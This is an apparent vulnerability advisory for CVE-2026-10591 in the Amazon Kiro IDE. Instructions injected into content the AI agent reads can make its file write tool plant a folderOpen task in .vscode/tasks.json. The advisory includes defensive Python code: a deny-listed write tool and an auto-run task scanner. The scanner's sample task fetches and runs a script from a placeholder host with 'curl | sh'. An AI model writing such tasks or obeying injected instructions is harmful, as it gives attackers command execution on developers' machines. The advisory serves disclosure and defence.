Mallory
Severity: High

Arbitrary Command Execution via File Write Tool in Amazon Kiro IDE

Identifiers: CVE-2026-10591; CWE-732 (Incorrect Permission Assignment…)

CVE-2026-10591 is an insufficient access control vulnerability in the file write tool of Amazon Kiro IDE before version 0.11. A remote, unauthenticated actor can supply crafted instructions that cause the file write tool to write attacker-controlled content to execution-sensitive paths inside the workspace, such as .vscode/tasks.json. The development environment acts on such files automatically when the folder is opened (a task whose runOptions.runOn is set to "folderOpen" runs without the user invoking it), so a single file write is enough to trigger arbitrary command execution. The root cause is that the file write tool does not adequately restrict where within the workspace it may write, so files that control task execution are as writable as ordinary source files.
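To make the root cause concrete, here is an added example (not Kiro's code, and not taken from the advisory) of a workspace-scoped file-write tool in two versions: one that only checks that the target lies inside the workspace, and one that additionally refuses execution-sensitive paths. The deny list, the `.kiro/hooks/` entry and the `echo pwned` task command are assumptions made for illustration; `runOptions.runOn = "folderOpen"` is the real tasks.json property that makes a task run on folder open.

```python
"""Added example: a file-write tool that only checks workspace containment,
beside a hardened version that also denies execution-sensitive paths."""
import json
import os
import tempfile
from pathlib import Path

# Constructed attacker-controlled content: a task that runs on folder open.
# The command is a harmless placeholder standing in for the attacker's payload.
AUTORUN_TASKS_JSON = json.dumps({
    "version": "2.0.0",
    "tasks": [{
        "label": "build",
        "type": "shell",
        "command": "echo pwned",
        "runOptions": {"runOn": "folderOpen"},
    }],
}, indent=2)

# Workspace-relative paths whose content changes what the IDE executes.
# This list is an assumption for the example, not Kiro's own policy.
EXECUTION_SENSITIVE = (
    ".vscode/tasks.json",
    ".vscode/launch.json",
    ".vscode/settings.json",
    ".git/hooks/",
    ".kiro/hooks/",   # assumed agent-hook location, illustration only
)


class WriteDenied(PermissionError):
    pass


def _resolve_inside(workspace: Path, relpath: str) -> Path:
    """Resolve relpath under workspace (following symlinks) and reject escapes."""
    root = workspace.resolve()
    target = (root / relpath).resolve()
    if target != root and root not in target.parents:
        raise WriteDenied(f"path escapes workspace: {relpath}")
    return target


def write_file_unrestricted(workspace: Path, relpath: str, content: str) -> Path:
    """Pre-fix behaviour: anything inside the workspace is writable, including
    files the IDE acts on automatically."""
    target = _resolve_inside(workspace, relpath)
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(content)
    return target


def write_file_guarded(workspace: Path, relpath: str, content: str) -> Path:
    """Hardened behaviour: same containment check, plus a deny list evaluated on
    the resolved path, so traversal or symlink spellings of .vscode/tasks.json
    are refused as well."""
    target = _resolve_inside(workspace, relpath)
    rel = target.relative_to(workspace.resolve()).as_posix()
    for blocked in EXECUTION_SENSITIVE:
        if rel == blocked or (blocked.endswith("/") and rel.startswith(blocked)):
            raise WriteDenied(f"refusing to write execution-sensitive path: {rel}")
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(content)
    return target


def demo() -> dict:
    """Run both tools against a throwaway workspace; return what each allowed."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        ws = Path(tmp)
        # An ordinary source file passes the guarded tool.
        write_file_guarded(ws, "src/app.py", "print('hello')\n")
        results["src_ok"] = (ws / "src" / "app.py").exists()
        # The unrestricted tool happily writes the auto-run task file.
        write_file_unrestricted(ws, ".vscode/tasks.json", AUTORUN_TASKS_JSON)
        results["unrestricted_wrote_tasks"] = (ws / ".vscode" / "tasks.json").exists()
        # A symlink with an innocent name that points at tasks.json.
        try:
            os.symlink(os.path.join("..", ".vscode", "tasks.json"), ws / "src" / "notes.txt")
            spellings = (".vscode/tasks.json", "src/../.vscode/tasks.json", "src/notes.txt")
        except OSError:  # platforms without symlink support: skip that case
            spellings = (".vscode/tasks.json", "src/../.vscode/tasks.json")
        for spelling in spellings:
            try:
                write_file_guarded(ws, spelling, AUTORUN_TASKS_JSON)
                results[spelling] = "allowed"
            except WriteDenied:
                results[spelling] = "denied"
    return results


if __name__ == "__main__":
    print(demo())
```

The point of resolving before matching is that a deny list compared against the caller's spelling of the path is trivially bypassed with `..` segments or a symlink; the check must run on the path the filesystem will actually open.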


ANALYST BRIEF: Impact, mitigation & remediation

Impact

What an attacker gets.

Successful exploitation yields arbitrary command execution on the developer's machine as the user running Amazon Kiro IDE. With that foothold an attacker can run commands, read any data that user can reach (source code and credentials stored on the machine included), alter project files or IDE configuration, and disrupt the local development environment, so confidentiality, integrity and availability are all affected. The CVSS context rates impact high on all three, with user interaction required: the victim has to open the workspace that contains the modified file.

Mitigation

If you can’t patch tonight, do this now.

If immediate upgrade is not possible, reduce exposure on three fronts. First, keep untrusted remote content and instructions (web pages, issues, documentation and anything else the agent reads on your behalf) away from sessions in which the file write tool is enabled, since that is what can carry the crafted instructions. Second, restrict or monitor writes to execution-sensitive workspace files such as .vscode/tasks.json; file-integrity monitoring or a read-only tasks.json is a workable stopgap. Third, do not open folders whose workspace metadata may have been modified by an untrusted source until the IDE is updated, and review .vscode/tasks.json in any workspace the agent has worked in for tasks with "runOn": "folderOpen" before opening it. None of this substitutes for the fix: upgrade to version 0.11 or later.
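The review step above is easy to automate. The following is an added example (not Kiro's code, not from the advisory) that scans a workspace's .vscode/tasks.json for tasks the IDE would run on folder open. It tolerates the comments and trailing commas VS Code allows in tasks.json, which a plain `json.loads` rejects. The sample tasks.json is constructed for the example, and `example.invalid` is a placeholder host, not a real one.

```python
"""Added example: flag auto-run tasks in a workspace's .vscode/tasks.json
before opening the folder in the IDE."""
import json
import re
import tempfile
from pathlib import Path

# tasks.json is JSON-with-comments. One pass keeps string literals verbatim,
# drops // and /* */ comments, and removes trailing commas before } or ].
_JSONC_RE = re.compile(
    r'("(?:\\.|[^"\\])*")'      # group 1: string literal, kept as-is
    r'|//[^\n]*|/\*.*?\*/'      # comments, dropped
    r'|,(\s*[}\]])',            # group 2: trailing comma, comma dropped
    re.S,
)


def load_jsonc(text: str):
    def repl(m: re.Match) -> str:
        if m.group(1) is not None:
            return m.group(1)
        if m.group(2) is not None:
            return m.group(2)
        return ""
    return json.loads(_JSONC_RE.sub(repl, text))


def autorun_tasks(tasks_json_text: str) -> list:
    """Return (label, command) for every task whose runOptions.runOn is
    "folderOpen", i.e. a task the IDE starts without the user asking."""
    doc = load_jsonc(tasks_json_text)
    found = []
    for task in doc.get("tasks", []):
        if not isinstance(task, dict):
            continue
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            cmd = task.get("command") or task.get("script") or "<none>"
            found.append((task.get("label", "<unlabelled>"), cmd))
    return found


def scan_workspace(root: Path) -> list:
    """Report auto-run tasks under root/.vscode/tasks.json, if the file exists."""
    path = root / ".vscode" / "tasks.json"
    if not path.is_file():
        return []
    return autorun_tasks(path.read_text())


# Constructed sample: what a prompt-injected file write might leave behind.
SAMPLE_TASKS_JSON = '''{
  // comments are allowed here, as in VS Code
  "version": "2.0.0",
  "tasks": [
    {"label": "lint", "type": "shell", "command": "npm run lint"},
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -fsSL http://example.invalid/x | sh",  // placeholder host
      "runOptions": {"runOn": "folderOpen"},
    },
  ]
}'''


def demo() -> list:
    """Write the sample into a throwaway workspace and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        ws = Path(tmp)
        (ws / ".vscode").mkdir()
        (ws / ".vscode" / "tasks.json").write_text(SAMPLE_TASKS_JSON)
        return scan_workspace(ws)


if __name__ == "__main__":
    for label, cmd in demo():
        print(f"auto-run task {label!r}: {cmd}")
```

Run it against each workspace directory the agent has touched and treat any reported task you did not write yourself as a compromise indicator rather than a configuration quirk.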

Remediation

Patch, then assume compromise.

Upgrade Amazon Kiro IDE to version 0.11 or later, which adds the missing restrictions on where the file write tool may write. After patching, assume the workspace may already have been modified: review .vscode/tasks.json and the rest of the IDE configuration in every workspace the agent worked in while the vulnerable version was installed, and treat any auto-run task you did not create as evidence of compromise.
PUBLIC EXPLOITS


No public exploit code observed for this vulnerability.

EXPOSURE SURFACE

Affected products & vendors

Vendor: Amazon Web Services
Product: Kiro IDE
Type: application

Vendor-confirmed product mapping.
